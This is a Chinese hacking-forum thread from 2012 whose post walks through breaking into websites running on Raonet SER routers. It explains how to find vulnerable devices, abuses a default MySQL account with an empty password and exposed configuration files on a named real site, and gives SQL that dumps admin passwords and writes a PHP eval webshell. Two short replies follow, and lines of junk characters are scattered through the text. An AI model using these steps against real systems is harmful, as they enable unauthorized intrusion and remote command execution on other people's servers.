中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
* q" Z# T( ~ {2 P; @! ~
. V2 C& Q0 w- j: v; L% t$ A5 a
1:google搜索'Raonet Subscriber Ethernet Router'
+ }3 o5 s& J2 ^8 X7 ] f2 s5 J
5 r' U9 l2 _: S& J2 \* [
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# F- C7 ?2 d* [$ U$ q+ T
2 D+ J. i% K% P5 ~1 P; j1 q* K9 ^
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! B2 l* C! p" p1 U6 i
8 g s( |; _+ o! D& l) B- o
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
m" {" i4 z. }& k8 R M
# G4 {2 Q. d$ I* @4 h9 `
& S8 m8 { r" _5 {6 @: ?& a
% J9 Y$ M7 j7 v+ H
入侵步骤:
- p+ B$ V" v$ p, H6 s8 R& s+ j/ V) d( O
, f3 f9 w. y9 F$ U8 T" I& M {
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
- A: V3 V5 q5 L" d {& z) a
$ |0 [" A: t4 \& N! |$ |( p; D6 y2 }
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
^4 e, l, o/ V' ?3 V/ y& W
3:得到密码后连接,查看GUI管理密码:
/ R) O$ f# \4 M% g* J
use ser_500
0 F7 e8 i" H6 X" t& Q
select id,passwd from user;
6 O' T, b, ]% K/ B3 p+ k( M
4:通过数据库写入webshell,执行命令:
% k- G0 [! I& Y H: l
use mysql;
2 s, i1 ]4 p8 b
create table ok(cmd TEXT);
8 A; G, V1 j2 E* |
insert into ok values("<?php @eval($_POST[cmd])?>");
6 y; ]+ q* n2 B5 ]2 w4 G+ ~1 ~9 [/ I
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
4 _: _% N e- }* ?
drop table ok;
9 T. t b5 t! p" m
# W: A9 ~8 u% B1 g
5:连接后门shell.php
3 ^+ [$ w; s! a5 t9 r7 s
) b. M- `' }. g' ]" P: x
6. 搞定!
2 C9 F! w! t& c! a; i( B+ |3 x" ^
2 a6 u8 T9 b X! y) z
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2